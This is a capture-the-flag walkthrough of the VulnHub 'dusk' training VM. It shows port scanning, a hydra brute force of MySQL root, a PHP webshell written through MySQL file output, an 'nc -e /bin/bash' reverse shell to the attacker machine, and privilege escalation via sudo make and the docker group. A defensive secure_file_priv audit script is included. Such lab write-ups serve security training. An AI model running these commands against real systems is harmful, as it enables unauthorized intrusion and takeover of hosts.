VulnHub target range: dusk
Environment setup
Target VM download: https://www.vulnhub.com/entry/sunset-dusk,404/
Attacker: kali (192.168.109.128)
Target: dusk (192.168.109.180)
After downloading the target VM, import it directly into VMware Workstation Pro, set the network adapter to NAT mode and start it.
Information gathering
Use arp-scan to locate the target VM
The target IP is confirmed as 192.168.109.180
Use nmap to scan the target's open ports
nmap -Pn -sV -p- -A 192.168.109.180
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-20 17:01 CST
Nmap scan report for 192.168.109.180
Host is up (0.0013s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.109.180:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 b5:ff:69:2a:03:fd:6d:04:ed:2a:06:aa:bf:b2:6a:7c (RSA)
| 256 0b:6f:20:d6:7c:6c:84:be:d8:40:61:69:a2:c6:e8:8a (ECDSA)
|_ 256 85:ff:47:d9:92:50:cb:f7:44:6c:b4:f4:5c:e9:1c:ed (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: dusk.dusk, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
| ssl-cert: Subject: commonName=dusk.dusk
| Subject Alternative Name: DNS:dusk.dusk
| Not valid before: 2019-11-27T21:09:14
|_Not valid after: 2029-11-24T21:09:14
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
3306/tcp open mysql MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.18-MariaDB-0+deb10u1
| Thread ID: 38
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, SupportsCompression, Speaks41ProtocolOld, SupportsLoadDataLocal, FoundRows, IgnoreSpaceBeforeParenthesis, SupportsTransactions, IgnoreSigpipes, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew, ODBCClient, InteractiveClient, DontAllowDatabaseTableColumn, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: O1HURz3*w>k%o#\)TMf9
|_ Auth Plugin Name: mysql_native_password
8080/tcp open http PHP cli server 5.5 or later (PHP 7.3.11-1)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 00:0C:29:DA:B8:CA (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: dusk.dusk; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.33 ms 192.168.109.180
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.14 seconds
Open ports: 21, 22, 25, 80, 3306, 8080
First try logging in to FTP as the anonymous user to see what is there
The connection fails outright, so this port is abandoned
Visit port 80 of the target in a browser
It is just the default Apache page; nothing found
Use dirb to scan the site's directory structure
The scan turns up no useful pages
The target also has port 8080 open, which is another HTTP service
Visit port 8080 of the target in a browser
It lists the files under the current site and the site's working directory: /var/tmp
Looking through these files reveals nothing exploitable either
Exploitation
Neither port 80 nor 8080 offers a way in, but information gathering showed the target also runs a MySQL server, so try brute-forcing it
hydra -l root -P /usr/share/wordlists/rockyou.txt -t 50 mysql://192.168.109.180
The database password is cracked successfully; log in to the database and look around
mysql -h 192.168.109.180 -uroot -ppassword
show databases;
use mysql;
show tables;
select * from user;
But nothing useful is found here either
Check whether the database has file read/write permission
When secure_file_priv is empty, directories on disk can be read.
When secure_file_priv is G:\, files on the G: drive can be read.
When secure_file_priv is NULL, load_file cannot load files.
This shows the database currently has permission to write files anywhere. Port 8080 earlier revealed the site's working directory as /var/tmp, so MySQL's write permission can be used to write a one-line webshell into that working directory.
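As an added example (not part of the original write-up), the following Python script audits the secure_file_priv behaviour described above from the defender's side: it reads the value from a my.cnf fragment and reports which web-served directories the database could write files into. The my.cnf fragments and the directory list are constructed for the example; /var/tmp is the web root the write-up found on port 8080.

```python
# Added example (not from the original write-up): audit MySQL/MariaDB
# secure_file_priv against web-served directories, the condition this
# box exploited (empty secure_file_priv plus a web root of /var/tmp).
import os
import re

# Constructed my.cnf fragments: the weak setting seen on the target and
# a hardened one confining OUTFILE/LOAD_FILE to a dedicated directory.
WEAK_CNF = "[mysqld]\nsecure_file_priv=\n"
HARDENED_CNF = "[mysqld]\nsecure_file_priv=/var/lib/mysql-files\n"


def parse_secure_file_priv(cnf_text):
    """Return the raw secure_file_priv value from a my.cnf-style text.

    "" means no restriction, "NULL" means file operations are disabled,
    any other value is the only directory allowed, and None means the
    option is absent (assumption: treated as unrestricted, MariaDB's default).
    """
    for line in cnf_text.splitlines():
        m = re.match(r"\s*secure[-_]file[-_]priv\s*=\s*(.*?)\s*$", line)
        if m:
            return m.group(1).strip("\"'")
    return None


def db_can_write_to(secure_file_priv, target_dir):
    """True if SELECT ... INTO OUTFILE could drop a file into target_dir."""
    if secure_file_priv is None or secure_file_priv == "":
        return True                      # no restriction at all
    if secure_file_priv.upper() == "NULL":
        return False                     # server-side file I/O disabled
    allowed = os.path.normpath(secure_file_priv)
    target = os.path.normpath(target_dir)
    # Only the configured directory and its subdirectories are reachable.
    return target == allowed or target.startswith(allowed + os.sep)


def audit(cnf_text, web_roots):
    """Return the web roots the database could write into under cnf_text."""
    value = parse_secure_file_priv(cnf_text)
    return [d for d in web_roots if db_can_write_to(value, d)]


if __name__ == "__main__":
    roots = ["/var/www/html", "/var/tmp"]
    print("weak config exposes:", audit(WEAK_CNF, roots))
    print("hardened config exposes:", audit(HARDENED_CNF, roots))
```

The same check can be run live with `SHOW VARIABLES LIKE 'secure_file_priv';`, and an empty result on a host whose web root is also local is the finding to fix.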
Visit the webshell file in the browser to check whether the write succeeded
A new PHP file has appeared under the web root, which confirms the webshell was written successfully
Connect to it with AntSword
Try to get a reverse shell
Kali terminal: nc -lvvp 4444
AntSword terminal: nc -e /bin/bash 192.168.109.128 4444
A shell comes back to Kali successfully
Privilege escalation
Check the current user's sudo commands
Look up the escalation method on a privilege-escalation reference site
COMMAND='/bin/sh'
sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"
Successfully switched to the dusk user; check dusk's sudo commands
Without dusk's password this cannot be checked, so check the dusk user's id instead
The dusk user is a member of the docker group; look up the method on the privilege-escalation reference site again
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Root obtained; switch to the root home directory and get the flag. The dusk target is complete.